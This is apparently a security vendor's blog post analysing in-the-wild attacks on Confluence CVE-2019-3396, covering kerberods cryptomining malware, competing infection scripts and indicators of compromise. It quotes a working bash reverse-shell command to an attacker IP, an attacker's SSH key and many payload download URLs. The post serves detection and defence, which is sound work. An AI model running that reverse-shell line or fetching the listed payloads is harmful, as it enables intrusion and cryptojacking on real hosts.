Blog

An Unauthenticated RCE Gold Rush: A Look at Attacks Exploiting Confluence CVE-2019-3396

The recent Confluence vulnerability (CVE-2019-3396) created a gold rush for threat actors. Attackers are exploiting it for cryptojacking, DDoS attacks, and ransomware. We observed some of these attacks in the wild and via our honeypots. In this blog we will share interesting details from the attacks.

CVE-2019-3396

On March 20th, 2019 the vulnerability was announced and shortly after, proof of concepts (PoCs) followed. Next there were reports of unusual activity in user forums and lastly came reports of attacks exploiting the vulnerability.

CVE-2019-3396 is a critical remote code execution vulnerability that exists on Confluence Server. Confluence is typically served on TCP Port 8090 and the vulnerability can be exploited without authentication with a specially crafted HTTP POST request.

According to major Internet scan services, there are tens of thousands of Confluence servers accessible to the Internet (however it is not immediately apparent which of these servers are running vulnerable versions).

On April 10th, a detailed analysis of the vulnerability, which included a PoC, was published. The actual PoC itself appeared on GitHub almost a week earlier on April 4th. Metasploit released a module as well shortly later. We first observed attacks on April 8th.

Unusual Behavior and Attack Reporting
In early April, users in the Atlassian Confluence forums began sharing details of compromises they were experiencing:
 
 
Shortly later, Trend Micro wrote detailed blogs describing attacks they observed:
 
 
CERN Computer Security also reported similar activity:
 
 

Based on open source reporting, it was evident that the vulnerability was being rapidly exploited. In a short period of time, multiple entities and malware families are being used in the attacks.

Attack Details From Our Dataset

The first activity we observed occurred on April 8th. We found this intriguing because the PoC was released on April 10th and the majority of the subsequent activity we observed occurred after that date. The very first post-exploitation activity we saw was the following command:

bash -i >& /dev/tcp/45.76.191.111/2012 0>&1

This sets up a reverse bash shell to the remote IP 45.76.191.111. Based on our telemetry it does not appear much interaction occurred with this host.

Kerberods Malware

A number of reports describe attacks involving malware named kerberods. It has been reported both in Confluence exploits, as well as a slightly older Jenkins exploit. The malware drops and compiles a library to provide rootkit functionality. The malware also drops a file named khugepageds (XMRig) which is responsible for cryptomining.

We first observed kerberods in our dataset on April 11th. It was installed via a script hosted on at https://pastebin[.]com/raw/Zk7Jv9j2:

Figure 1. A snippet of the kerberods install script.

 Shortly following the install, khugepageds connects to systemten[.]org:51640 for the purpose of Monero (XMR) mining.

Additionally, kerberods was observed contacting the following domains:

adfsar[.]cencosud[.]com
auth[.]iws-hybrid-qa.tmicss[.]com
connect[.]vistaequitypartners[.]com
ident[.]me
monitor[.]unitq[.]com
paneltxd[.]cl
unifi[.]voltaiq-eng[.]com
www[.]clearslide[.]com
www[.]picallex[.]com
 
We assume this communication was command and control related, however we did not observe the details. The presence of legitimate domains like www[.]clearslide[.]com was rather intriguing. The malware attempts to propagate by reading from root’s known_host file and then authenticating to hosts that were found. In addition to this, this malware attempts to add its own SSH key.
 

Figure 2. Download snippet for public SSH key.

This SSH key was distinctive because it contained the comment “FBI@USA.GOV” which is helpful for threat actor tracking and detection:

ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDZnO+F/CKFgcs1jRmWcN1bzitmSrUuvKS6OM79ywu
oETUVXnp1IFxfwMlc1Ewlkd5hVPk0bE6/mX4hH2wYmO2w/TKkyKD50/v3J/rcAcsrQ3uu9o
pXpjFtXxm4GuXT0tt1ITf5kwevh0Xj1oqiV/2pXn9mm6uTfXafvCRM+3nWj74U0Gh+U4gyc
2n3dVqgZHOZWhV6fFp5MJ9HM1bTTsREbVbvIjG2B0msAQxqRTuaLpARF3YbSu3yL7PDXjLn
il5s7GihHTZlngqlu9BrvwT6LuJ0v18pdaNiSTtmw8tY+XMIuQ4H8ZuwLuBzk9XW17LVGfj
rz8i5pmvruSgHX7xv FBI@USA.GOV

 

In later attacks, coming from a different threat actor, we observed a script downloaded from https://bitbucket[.]org/imraldf134/mygit/raw/master/zz.sh and http://193[.]57[.]40[.]46/k.sh.

The script contains logic to kill kerberods and khugepageds process (along with some other familiar names such as dblaunchs, watchbog, and suste):

Figure 3. A snippet of zz.sh showing a process killing for other malware families.

It appears that other attackers were quick to respond to the spread of kerberods as this appeared a couple of days after our first sighting of kerberods. A recent blog from Intezer highlights threat actor groups fighting over resources in cloud.

Reverse Shell as a Service

On April 13th we observed an interesting tactic that was unrelated to kerberods. This was a connection to shell[.]now[.]sh. This domain hosts a simple reverse shell as a service. In our case it does not appear anyone successfully interacted with the shell. However, similar to the shell mentioned earlier, the idea of an interactive session following an exploit like this is interesting considering most other attacks are automated.

 

Figure 4. Landing page and usage for the reverse shell as a service at shell[.]now[.]sh.

Additional Attacks

In addition to the aforementioned activity, we observed other attacks against exploiting this vulnerability. These attacks dropped malware components more or less similar to kerberods. The main functionalities observed were cryptomining, persistence, and propagation. Below is a list of additional files we saw frequently:

/tmp/.dbb/dblaunchs
/tmp/.dbb/dblaunchs_0xBB042
/tmp/[…]/watchbog
/tmp/.dba/dblaunchs_0xBB041
/tmp/.sysinfo/a319660436b4ce21b5da4fe407676ea5a
 
Final Thoughts

Unauthenticated remote code exploits against internet facing applications create a gold rush for threat actors. In the case of the Confluence vulnerability, a few weeks passed before servers were getting floods of automated attacks and attempts for interactive compromise. As new threat actors attempt to grab a foothold we see install scripts battling for control of the infected hosts.

For prevalent threat actor groups, like Rocke, attacks like these are one in a larger portfolio. This may be the tip of the iceberg as it is unknown if this vulnerability is being leveraged in any targeted attacks.

This activity highlights the importance of traditional security practices such as updating, patching, and configuration auditing. Having a host IDS can also help alert on activity such as this.

If you would like to learn more about how Lacework provides workload security to detect attacks, follow this link to kick off a Free Cloud Risk & Threat Assessment to learn more.

Indicators

Files (SHA256)

6e26a649c7cecae0f367e53e901529717bddce9ae5ec9dff070b8c3392c13e71 (watchbog)
7f52efd3d2a99475164a9413ed2d1b947129099d67c72583633cedbc6032f8e5 (dblaunchs)
8269773c98c259acb7d109de1c448673d1e45b3684834b19335bd42c84977e4c (watchbog)
a6876c0caebfa1eacf13b8236fa64e509e1df2fe9c88b0a03eea880c8023dbcb (dblaunchs_0xBB041)
c39b2db5e3d54335c5320f399212c9e073c48f001a8dd9250f711d45420d3a2a (dblaunchs_0xBB042)
f882528e1ac9ca36db8354822e527c50c141aea05b6e120ff5a61e3a170ba5f9 (khugepaged)
92a6c2a5a70f6535bb3bfdffb3c3829ffae8a9bea380c34311e72dc0f66bcfdb (a319660436b4ce21b5da4fe407676ea5a)
 
IPs
104[.]238[.]151[.]101
132[.]148[.]148[.]79
166[.]62[.]38[.]167
185[.]193[.]125[.]146
193[.]57[.]40[.]46
198[.]12[.]156[.]218
45[.]76[.]191[.]111
 
Domains
1[.]z9ls[.]com
t[.]w2wz[.]cn
dd[.]heheda[.]tk
systemten[.]org
adfsar[.]cencosud[.]com
auth[.]iws-hybrid-qa.tmicss[.]com
connect[.]vistaequitypartners[.]com
ident[.]me
monitor[.]unitq[.]com
paneltxd[.]cl
unifi[.]voltaiq-eng[.]com
www[.]clearslide[.]com
www[.]picallex[.]com
shell[.]now[.]sh
 
URLs
http://1[.]z9ls[.]com/t6/701/1555231425×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555238887×2728278704[.]jpg
http://1[.]z9ls[.]com/t6/701/1555298518×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555302073×2918527158[.]jpg
http://1[.]z9ls[.]com/t6/701/1555396475×2918527158[.]jpg
http://104[.]238[.]151[.]101/0[.]sh
http://132[.]148[.]148[.]79/plus/java
http://132[.]148[.]148[.]79/plus/java2
http://132[.]148[.]148[.]79/plus/java3c
http://132[.]148[.]148[.]79/plus/javad
http://166[.]62[.]38[.]167/plus/cx
http://166[.]62[.]38[.]167/plus/cx[.]2
http://166[.]62[.]38[.]167/plus/java
http://166[.]62[.]38[.]167/plus/java2
http://166[.]62[.]38[.]167/plus/java3c
http://166[.]62[.]38[.]167/plus/javacf
http://166[.]62[.]38[.]167/plus/javacj
http://166[.]62[.]38[.]167/plus/javacp
http://166[.]62[.]38[.]167/plus/javad
http://166[.]62[.]38[.]167/plus/javapo
http://166[.]62[.]38[.]167/plus/kok
http://166[.]62[.]38[.]167/plus/rc9
http://166[.]62[.]38[.]167/plus/wow_cf
http://16e6734d[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://16e6734d[.]ngrok[.]io/m?o=18204&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://185[.]193[.]125[.]146/lsd[.]sh
http://18b2f573[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://18b2f573[.]ngrok[.]io/d8/nginx
http://193[.]57[.]40[.]46/k[.]sh
http://193[.]57[.]40[.]46/mj[.]sh
http://193[.]57[.]40[.]46/rep2[.]php
http://198[.]12[.]156[.]218/plus/java
http://198[.]12[.]156[.]218/plus/java2
http://198[.]12[.]156[.]218/plus/java3c
http://198[.]12[.]156[.]218/plus/javad
http://198[.]12[.]156[.]218/plus/kok
http://2b363bfc[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://2b363bfc[.]ngrok[.]io/d8/daemon
http://2b363bfc[.]ngrok[.]io/d8/nginx
http://3678cd3f[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://426c9be3[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://4765911b[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://5c0e35c1[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://681f224d[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://6d388090[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://6d388090[.]ngrok[.]io/m?o=18204&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://820c29ed[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://820c29ed[.]ngrok[.]io/m?o=12568&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://9d09805e[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://9d09805e[.]ngrok[.]io/d8/daemon
http://9d09805e[.]ngrok[.]io/d8/nginx
http://9d09805e[.]ngrok[.]io/m?o=12568&r=a319660436b4ce21b5da4fe407676ea5&t=2&l=o&u=confluence
http://b13a1a66[.]ngrok[.]io/f/serve?l=o&r=a319660436b4ce21b5da4fe407676ea5
http://f6d5a7f2[.]ngrok[.]io/c?r=a319660436b4ce21b5da4fe407676ea5
http://t[.]w2wz[.]cn/t6/700/1554994491×2918527122[.]jpg
http://t[.]w2wz[.]cn/t6/700/1554995474×2890211696[.]jpg
http://t[.]w2wz[.]cn/t6/701/1555134238×2890211786[.]jpg
https://bitbucket[.]org/imraldf134/mygit/raw/master/x_64
https://bitbucket[.]org/imraldf134/mygit/raw/master/zz[.]sh
https://dd[.]heheda[.]tk/i[.]jpg
https://dd[.]heheda[.]tk/id_rsa[.]pub
https://dd[.]heheda[.]tk/x86_64-static-linux-uclibc[.]jpg
https://github[.]com/fireice-uk/xmr-stak/releases/download/2[.]10[.]3/xmr-stak-linux-2[.]10[.]3-cpu[.]tar[.]xz
https://github[.]com/xmrig/xmrig/releases/download/v2[.]14[.]0/xmrig-2[.]14[.]0-xenial-x64[.]tar[.]gz
https://github[.]com/xmrig/xmrig/releases/download/v2[.]15[.]1-beta/xmrig-2[.]15[.]1-beta-xenial-x64[.]tar[.]gz
https://pastebin[.]com/raw/0Sxacvsh
https://pastebin[.]com/raw/B3R5Unwh
https://pastebin[.]com/raw/BtwXn5qH
https://pastebin[.]com/raw/HiPxCJRS
https://pastebin[.]com/raw/KGwfArMR
https://pastebin[.]com/raw/SPG1SGPw
https://pastebin[.]com/raw/V85L9YaR
https://pastebin[.]com/raw/Zk7Jv9j2
https://pastebin[.]com/raw/aJkbTx6Y
https://pastebin[.]com/raw/hahwNEdB
https://pastebin[.]com/raw/u9PF30VQ
https://pastebin[.]com/raw/u9PF30VQ
>https://pastebin[.]com/raw/uV5Js3aa
https://pastebin[.]com/raw/v5XC0BJh
https://pastebin[.]com/raw/wDBa7jCQ
https://pastebin[.]com/raw/wR3ETdbi
https://pastebin[.]com/raw/xmxHzu5P
https://pastebin[.]com/raw/yvgxw9pG
https://pastebin[.]com/raw/zXcDajSs
https://pixeldrain[.]com/api/file/T8jt1Vsr
https://pixeldrain[.]com/api/file/jrASu-67?download
 
 

Photo by Aaron Munoz on Unsplash